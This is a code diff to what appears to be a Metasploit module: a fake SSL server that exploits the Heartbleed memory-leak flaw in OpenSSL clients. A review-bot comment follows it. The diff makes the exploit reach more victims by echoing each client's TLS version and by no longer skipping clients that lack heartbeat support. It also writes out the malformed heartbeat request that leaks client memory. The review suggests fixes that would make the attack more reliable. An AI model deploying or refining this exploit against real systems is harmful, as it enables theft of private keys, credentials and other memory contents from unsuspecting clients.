@@ -16,7 +16,7 @@ def initialize
16
16
'Description' => %q{
17
17
This module provides a fake SSL service that is intended to
18
18
leak memory from client systems as they connect. This module is
19
- hardcoded for TLS/1.1 using the AES-128-CBC-SHA1 cipher.
19
+ hardcoded for using the AES-128-CBC-SHA1 cipher.
20
20
} ,
21
21
'Author' =>
22
22
[
@@ -160,19 +160,12 @@ def process_openssl_cleartext_request(c, data)
160
160
161
161
print_status ( "#{ @state [ c ] [ :name ] } Processing Client Hello..." )
162
162
163
- # Ignore clients that do not support heartbeat requests
164
- unless data . index ( "\x0F \x00 \x01 \x01 " )
165
- print_status ( "#{ @state [ c ] [ :name ] } Client does not support heartbeats" )
166
- c . close
167
- return
168
- end
169
-
170
163
# Extract the client_random needed to compute the master key
171
164
@state [ c ] [ :client_random ] = data [ 11 , 32 ]
172
165
@state [ c ] [ :received_hello ] = true
173
166
174
167
print_status ( "#{ @state [ c ] [ :name ] } Sending Server Hello..." )
175
- openssl_send_server_hello ( c , data )
168
+ openssl_send_server_hello ( c , data , message_version )
176
169
return
177
170
end
178
171
@@ -203,7 +196,7 @@ def process_openssl_cleartext_request(c, data)
203
196
else
204
197
# Send heartbeat requests
205
198
if @state [ c ] [ :heartbeats ] . length < heartbeat_limit
206
- openssl_send_heartbeat ( c )
199
+ openssl_send_heartbeat ( c , message_version )
207
200
end
208
201
209
202
# Process cleartext heartbeat replies
@@ -244,7 +237,7 @@ def process_openssl_encrypted_request(c, data)
244
237
245
238
# Send heartbeat requests
246
239
if @state [ c ] [ :heartbeats ] . length < heartbeat_limit
247
- openssl_send_heartbeat ( c )
240
+ openssl_send_heartbeat ( c , message_version )
248
241
end
249
242
250
243
# Process heartbeat replies
@@ -305,14 +298,14 @@ def on_client_close(c)
305
298
end
306
299
307
300
# Send an OpenSSL Server Hello response
308
- def openssl_send_server_hello ( c , hello )
301
+ def openssl_send_server_hello ( c , hello , version )
309
302
310
303
# Create the Server Hello response
311
304
extensions =
312
305
"\x00 \x0f \x00 \x01 \x01 " # Heartbeat
313
306
314
307
server_hello_payload =
315
- " \x03 \x02 " + # TLS Version 1.1
308
+ [ version ] . pack ( 'n' ) + # Use the protocol version sent by the client.
316
309
@state [ c ] [ :server_random ] + # Random (Timestamp + Random Bytes)
317
310
"\x00 " + # Session ID
318
311
"\x00 \x2F " + # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA)
@@ -321,31 +314,31 @@ def openssl_send_server_hello(c, hello)
321
314
322
315
server_hello = [ 0x02 ] . pack ( "C" ) + [ server_hello_payload . length ] . pack ( "N" ) [ 1 , 3 ] + server_hello_payload
323
316
324
- msg1 = "\x16 \x03 \x02 " + [ server_hello . length ] . pack ( "n" ) + server_hello
317
+ msg1 = "\x16 " + [ version ] . pack ( 'n' ) + [ server_hello . length ] . pack ( "n" ) + server_hello
325
318
c . put ( msg1 )
326
319
327
320
# Skip the rest of TLS if we arent negotiating it
328
321
unless negotiate_tls?
329
322
# Send a heartbeat request to start the stream and return
330
- openssl_send_heartbeat ( c )
323
+ openssl_send_heartbeat ( c , version )
331
324
return
332
325
end
333
326
334
327
# Certificates
335
328
certs_combined = generate_certificates
336
329
pay2 = "\x0b " + [ certs_combined . length + 3 ] . pack ( "N" ) [ 1 , 3 ] + [ certs_combined . length ] . pack ( "N" ) [ 1 , 3 ] + certs_combined
337
- msg2 = "\x16 \x03 \x02 " + [ pay2 . length ] . pack ( "n" ) + pay2
330
+ msg2 = "\x16 " + [ version ] . pack ( 'n' ) + [ pay2 . length ] . pack ( "n" ) + pay2
338
331
c . put ( msg2 )
339
332
340
333
# End of Server Hello
341
334
pay3 = "\x0e \x00 \x00 \x00 "
342
- msg3 = "\x16 \x03 \x02 " + [ pay3 . length ] . pack ( "n" ) + pay3
335
+ msg3 = "\x16 " + [ version ] . pack ( 'n' ) + [ pay3 . length ] . pack ( "n" ) + pay3
343
336
c . put ( msg3 )
344
337
end
345
338
346
339
# Send the heartbeat request that results in memory exposure
347
- def openssl_send_heartbeat ( c )
348
- c . put "\x18 \x03 \x02 \x00 \x03 \x01 " + [ heartbeat_read_size ] . pack ( "n" )
340
+ def openssl_send_heartbeat ( c , version )
341
+ c . put "\x18 " + [ version ] . pack ( 'n' ) + " \x00 \x03 \x01 " + [ heartbeat_read_size ] . pack ( "n" )
349
342
end
350
343
351
344
# Pack the certificates for use in the TLS reply
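Review bot: openssl_send_server_hello and openssl_send_heartbeat now copy the caller-supplied `version` into the ServerHello body and into every record header with no check that it is a version the module can actually finish a handshake for, so an SSLv3 or out-of-range value sent by the client is simply reflected back. Given the new comment says this is the protocol version sent by the client, I would bound it at the top of openssl_send_server_hello, e.g. `return c.close unless (0x0301..0x0303).cover?(version)`, which also covers the early heartbeat sent when negotiate_tls? is false. If the key-derivation code outside these hunks implements only the TLS 1.0/1.1 PRF, echoing 0x0303 would presumably yield a wrong master secret for TLS 1.2 clients, which is worth confirming before relying on the reflected value. Separately, with the heartbeat-extension check dropped from process_openssl_cleartext_request, the ServerHello still unconditionally advertises the heartbeat extension, which a client that never offered it may answer with an unsupported_extension alert; a short comment next to `extensions =` noting that trade-off (e.g. `# Always offered; clients that did not request it may abort the handshake`) would help the next reader. message_version is defined outside the visible hunks.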